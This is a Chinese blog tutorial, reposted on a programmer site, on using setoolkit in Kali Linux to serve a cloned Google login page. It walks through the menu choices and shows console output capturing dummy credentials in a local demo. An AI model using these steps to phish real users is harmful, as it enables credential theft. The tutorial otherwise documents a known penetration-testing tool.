欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

荐 【kali linux】setoolkit社会工程学攻击

程序员文章站 2022-06-19 11:56:50
setoolkit是一个为社会工程设计的开源渗透测试框架。SET具有许多自定义攻击向量,可让您快速进行可信的攻击。setoolkit 目录结构modulesreadmeREADME.mdrequirements.txtseautomateseproxysetoolkitsetup.pyseupdatesrc**setoolkit启动 **通过./setoolkit启动。看到如下图形,启动成功。默认会有如下选项Social-Engineering Attacks...

setoolkit是一个为社会工程设计的开源渗透测试框架。SET具有许多自定义攻击向量,可让您快速进行可信的攻击。

setoolkit 目录结构

modules
readme
README.md
requirements.txt
seautomate
seproxy
setoolkit
setup.py
seupdate
src

**setoolkit启动 **

通过./setoolkit启动。看到如下图形,启动成功。

荐
                                                        【kali linux】setoolkit社会工程学攻击

荐
                                                        【kali linux】setoolkit社会工程学攻击

默认会有如下选项

  1. Social-Engineering Attacks ##社会工程学攻击

  2. Penetration Testing (Fast-Track) ##快速追踪测试

  3. Third Party Modules ##第三方模块

  4. Update the Social-Engineer Toolkit ##升级软件

  5. Update SET configuration ##升级配置

  6. Help, Credits, and About ##帮助

  7. Exit the Social-Engineer Toolkit ##退出

这里制作个钓鱼网站为例子,选择1。

  1. Spear-Phishing Attack Vectors ## 鱼叉式网络钓鱼

  2. Website Attack Vectors ##网页攻击 钓鱼

  3. Infectious Media Generator ## 感染性性攻击,就是木马

  4. Create a Payload and Listener ##建立payloaad和listener

  5. Mass Mailer Attack ## 邮件群发攻击

  6. Arduino-Based Attack Vector ## Arduino基础攻击

  7. Wireless Access Point Attack Vector ##无线接入点攻击

  8. QRCode Generator Attack Vector ##二维码攻击

  9. Powershell Attack Vectors ##Powershell攻击

  10. Third Party Modules ##第三反模块

  11. Return back to the main menu.

选择2 网站攻击进行钓鱼。

  1. Java Applet Attack Method ## java程序攻击

  2. Metasploit Browser Exploit Method ##Metasploit 浏览器漏洞攻击

  3. Credential Harvester Attack Method ##钓鱼网站攻击

  4. Tabnabbing Attack Method

  5. Web Jacking Attack Method ## 网站jacking攻击

  6. Multi-Attack Web Method ## 多种网站攻击方式

  7. HTA Attack Method

  8. Return to Main Menu

选择3 钓鱼网站攻击。既然是网站钓鱼,就一定有网站的样式,这里是选择自己网站的样式,选择一个好的模板才能更好的社工。这里可以根据按照自己的喜欢自行选择。

  1. Web Templates ## web

  2. Site Cloner ## 网站克隆设置

  3. Custom Import ## 自定义导入

  4. Return to Webattack Menu

**这里只是演示,我选择1。**之后输入用户请求提交地址。我本地演示,输入我本地地址,用来获取用户信息。

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.31.188]:192.168.31.188

设置成功之后,默认带了3个模板供我们选择。这里我选择2 google的登录页面。

  1. Java Required
  2. Google
  3. Twitter

选择2之后,服务启动,如下说明访问当前地址80端口即可。

set:webattack> Select a template:2

[*] Cloning the website: http://www.google.com
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

浏览器输入启动服务机器的ip+80端口;即可看到如下google登录页面。

荐
                                                        【kali linux】setoolkit社会工程学攻击
在页面中试着输入账号密码,这里账号密码随意输入,对不对都行。之后点即 Sign in进行登录。随后控制台出现如下内容。

192.168.31.123 - - [25/Jul/2020 22:48:32] "GET / HTTP/1.1" 200 -
192.168.31.123 - - [25/Jul/2020 22:48:33] "GET /favicon.ico HTTP/1.1" 404 -
[*] WE GOT A HIT! Printing the output:
PARAM: GALX=SJLCkfgaqoM
PARAM: continue=https://accounts.google.com/o/oauth2/auth?
zt=ChR
PARAM: service=lso
PARAM: dsh=-73818871067
PARAM: _utf8=? 
PARAM: bgresponse=js_disab
PARAM: pstMsg=1
PARAM: dnConn=
PARAM: checkConnection=
PARAM: checkedDomains=youtube
POSSIBLE USERNAME FIELD FOUND: Email=123456
POSSIBLE PASSWORD FIELD FOUND: Passwd=654321
PARAM: signIn=Sign+in
PARAM: PersistentCookie=yes
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

这里很清楚的发现,用户输入的Email为123456,密码是654321。

本文地址:https://blog.csdn.net/qq_30285985/article/details/107590718